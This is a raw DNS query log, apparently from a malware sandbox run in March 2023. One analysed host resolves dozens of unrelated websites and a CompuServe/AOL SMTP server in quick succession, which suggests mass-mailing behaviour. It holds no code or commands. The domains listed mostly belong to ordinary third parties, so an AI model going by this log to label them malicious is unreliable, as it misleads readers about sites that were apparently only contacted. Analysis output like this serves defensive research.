                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.766395092 CET8.8.8.8192.168.2.50xd910No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.808809996 CET8.8.8.8192.168.2.50x19caNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.809648037 CET8.8.8.8192.168.2.50xea55Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.823520899 CET8.8.8.8192.168.2.50xf771Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.832866907 CET8.8.8.8192.168.2.50xf7f3No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.844579935 CET8.8.8.8192.168.2.50xdcfeServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.855600119 CET8.8.8.8192.168.2.50x9a58No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.872385979 CET8.8.8.8192.168.2.50x79f6Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.890609980 CET8.8.8.8192.168.2.50x7cb2No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.902745962 CET8.8.8.8192.168.2.50xf0e7No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.902745962 CET8.8.8.8192.168.2.50xf0e7No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.932804108 CET8.8.8.8192.168.2.50x364bNo error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.932804108 CET8.8.8.8192.168.2.50x364bNo error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.932804108 CET8.8.8.8192.168.2.50x364bNo error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.932804108 CET8.8.8.8192.168.2.50x364bNo error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.943810940 CET8.8.8.8192.168.2.50x5849No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.949584961 CET8.8.8.8192.168.2.50x1464No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.949584961 CET8.8.8.8192.168.2.50x1464No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.949584961 CET8.8.8.8192.168.2.50x1464No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.949584961 CET8.8.8.8192.168.2.50x1464No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.009269953 CET8.8.8.8192.168.2.50xab50No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.011774063 CET8.8.8.8192.168.2.50xd043No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.057780027 CET8.8.8.8192.168.2.50x7534No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.098186016 CET8.8.8.8192.168.2.50xc494No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.110553980 CET8.8.8.8192.168.2.50xe210No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.123347998 CET8.8.8.8192.168.2.50x24e7No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.131989956 CET8.8.8.8192.168.2.50x1dbbNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.199127913 CET8.8.8.8192.168.2.50xb769No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.214881897 CET8.8.8.8192.168.2.50x4770No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.214881897 CET8.8.8.8192.168.2.50x4770No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.248368025 CET8.8.8.8192.168.2.50x2d60No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.248368025 CET8.8.8.8192.168.2.50x2d60No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.248368025 CET8.8.8.8192.168.2.50x2d60No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.248368025 CET8.8.8.8192.168.2.50x2d60No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.262671947 CET8.8.8.8192.168.2.50x8105Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.283441067 CET8.8.8.8192.168.2.50x4bfdNo error (0)assideum.com52.219.94.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.288820028 CET8.8.8.8192.168.2.50x6860Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.322211981 CET8.8.8.8192.168.2.50x4d2eNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.322211981 CET8.8.8.8192.168.2.50x4d2eNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.322211981 CET8.8.8.8192.168.2.50x4d2eNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.336937904 CET8.8.8.8192.168.2.50xcff8No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.336937904 CET8.8.8.8192.168.2.50xcff8No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.341886044 CET8.8.8.8192.168.2.50x72ccNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.344254017 CET8.8.8.8192.168.2.50xfa4eNo error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.344300032 CET8.8.8.8192.168.2.50xa2f3No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.347570896 CET8.8.8.8192.168.2.50x5d43No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.349078894 CET8.8.8.8192.168.2.50x6ea2No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.349078894 CET8.8.8.8192.168.2.50x6ea2No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.420197964 CET8.8.8.8192.168.2.50x599dName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.428214073 CET8.8.8.8192.168.2.50x9761Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.446342945 CET8.8.8.8192.168.2.50x6028Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.448199987 CET8.8.8.8192.168.2.50x4557Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.448373079 CET8.8.8.8192.168.2.50x4557Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.467479944 CET8.8.8.8192.168.2.50x609cServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.500926971 CET8.8.8.8192.168.2.50x3e51No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.500926971 CET8.8.8.8192.168.2.50x3e51No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.527034044 CET8.8.8.8192.168.2.50x55eeServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.579493046 CET8.8.8.8192.168.2.50x71f6Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.590153933 CET8.8.8.8192.168.2.50x23b0No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.607299089 CET8.8.8.8192.168.2.50x768fNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.607299089 CET8.8.8.8192.168.2.50x768fNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.611951113 CET8.8.8.8192.168.2.50x2917Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.614566088 CET8.8.8.8192.168.2.50xec36No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.614566088 CET8.8.8.8192.168.2.50xec36No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.624196053 CET8.8.8.8192.168.2.50x8191No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.630359888 CET8.8.8.8192.168.2.50xdb6cNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.681746960 CET8.8.8.8192.168.2.50x2481No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.681746960 CET8.8.8.8192.168.2.50x2481No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.735651970 CET8.8.8.8192.168.2.50x38e1No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.737749100 CET8.8.8.8192.168.2.50xb4cdNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.748769045 CET8.8.8.8192.168.2.50xa3e7No error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.748769045 CET8.8.8.8192.168.2.50xa3e7No error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.752034903 CET8.8.8.8192.168.2.50x28e9No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.931724072 CET8.8.8.8192.168.2.50xc93dNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.056904078 CET8.8.8.8192.168.2.50xc5aeNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.132767916 CET8.8.8.8192.168.2.50x542cNo error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.132767916 CET8.8.8.8192.168.2.50x542cNo error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.138879061 CET8.8.8.8192.168.2.50xced7No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.158493042 CET8.8.8.8192.168.2.50xbf47No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.158493042 CET8.8.8.8192.168.2.50xbf47No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.158493042 CET8.8.8.8192.168.2.50xbf47No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.173939943 CET8.8.8.8192.168.2.50x7ecaNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.275768995 CET8.8.8.8192.168.2.50xac93No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.275768995 CET8.8.8.8192.168.2.50xac93No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.302892923 CET8.8.8.8192.168.2.50xe7e9No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.302892923 CET8.8.8.8192.168.2.50xe7e9No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.306004047 CET8.8.8.8192.168.2.50x6860Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.312345028 CET8.8.8.8192.168.2.50x6892Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.319610119 CET8.8.8.8192.168.2.50xf4f3No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.413614988 CET8.8.8.8192.168.2.50xc5f6No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.459582090 CET8.8.8.8192.168.2.50x6028Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.478836060 CET8.8.8.8192.168.2.50x51faNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.482903957 CET8.8.8.8192.168.2.50x609cServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.486758947 CET8.8.8.8192.168.2.50x5bb4No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.486758947 CET8.8.8.8192.168.2.50x5bb4No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.497313976 CET8.8.8.8192.168.2.50xadedServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.523623943 CET8.8.8.8192.168.2.50x2721No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.523710966 CET8.8.8.8192.168.2.50x80c8Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.556189060 CET8.8.8.8192.168.2.50x80c8Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.562942982 CET8.8.8.8192.168.2.50xd76bServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.661947966 CET8.8.8.8192.168.2.50x77eNo error (0)bount.com.tw188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.661947966 CET8.8.8.8192.168.2.50x77eNo error (0)bount.com.tw188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.704859972 CET8.8.8.8192.168.2.50xb892Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.742810965 CET8.8.8.8192.168.2.50xec1aNo error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.742810965 CET8.8.8.8192.168.2.50xec1aNo error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.742810965 CET8.8.8.8192.168.2.50xec1aNo error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.742810965 CET8.8.8.8192.168.2.50xec1aNo error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.742810965 CET8.8.8.8192.168.2.50xec1aNo error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.743721008 CET8.8.8.8192.168.2.50x62faName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.753053904 CET8.8.8.8192.168.2.50x28c1No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.753053904 CET8.8.8.8192.168.2.50x28c1No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.768963099 CET8.8.8.8192.168.2.50xc38Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.871331930 CET8.8.8.8192.168.2.50x9946Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.871391058 CET8.8.8.8192.168.2.50x960dNo error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.871391058 CET8.8.8.8192.168.2.50x960dNo error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.873143911 CET8.8.8.8192.168.2.50x1e2dNo error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.873143911 CET8.8.8.8192.168.2.50x1e2dNo error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.885445118 CET8.8.8.8192.168.2.50x484eNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.885445118 CET8.8.8.8192.168.2.50x484eNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.014132023 CET8.8.8.8192.168.2.50x5fdcNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.022779942 CET8.8.8.8192.168.2.50x6f25No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.065846920 CET8.8.8.8192.168.2.50xec7dNo error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.105403900 CET8.8.8.8192.168.2.50xffafNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.105403900 CET8.8.8.8192.168.2.50xffafNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.105403900 CET8.8.8.8192.168.2.50xffafNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.153692961 CET8.8.8.8192.168.2.50x82daNo error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.153692961 CET8.8.8.8192.168.2.50x82daNo error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.174066067 CET8.8.8.8192.168.2.50x93b0No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.176609039 CET8.8.8.8192.168.2.50x7629No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.249579906 CET8.8.8.8192.168.2.50xd8b5No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.346385002 CET8.8.8.8192.168.2.50xcc5aNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.427565098 CET8.8.8.8192.168.2.50xde2fNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.480680943 CET8.8.8.8192.168.2.50x483aNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.497023106 CET8.8.8.8192.168.2.50xadedServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.556117058 CET8.8.8.8192.168.2.50x3e63Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.594060898 CET8.8.8.8192.168.2.50x3e63Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.736031055 CET8.8.8.8192.168.2.50x6ac7No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.776210070 CET8.8.8.8192.168.2.50x74fcNo error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.825790882 CET8.8.8.8192.168.2.50x77a4No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.920089006 CET8.8.8.8192.168.2.50x7898No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.920089006 CET8.8.8.8192.168.2.50x7898No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.920089006 CET8.8.8.8192.168.2.50x7898No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.940285921 CET8.8.8.8192.168.2.50x28fdNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.984596968 CET8.8.8.8192.168.2.50x201aNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.043312073 CET8.8.8.8192.168.2.50xe8d5No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.043360949 CET8.8.8.8192.168.2.50xd7edNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.043360949 CET8.8.8.8192.168.2.50xd7edNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.043360949 CET8.8.8.8192.168.2.50xd7edNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.104598999 CET8.8.8.8192.168.2.50x6549Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.125236988 CET8.8.8.8192.168.2.50x1c59No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.204365015 CET8.8.8.8192.168.2.50x2755No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.204365015 CET8.8.8.8192.168.2.50x2755No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.204365015 CET8.8.8.8192.168.2.50x2755No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.204365015 CET8.8.8.8192.168.2.50x2755No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.210123062 CET8.8.8.8192.168.2.50x9470No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.230495930 CET8.8.8.8192.168.2.50xac56No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.251712084 CET8.8.8.8192.168.2.50xa27Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.281702995 CET8.8.8.8192.168.2.50xfc30Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
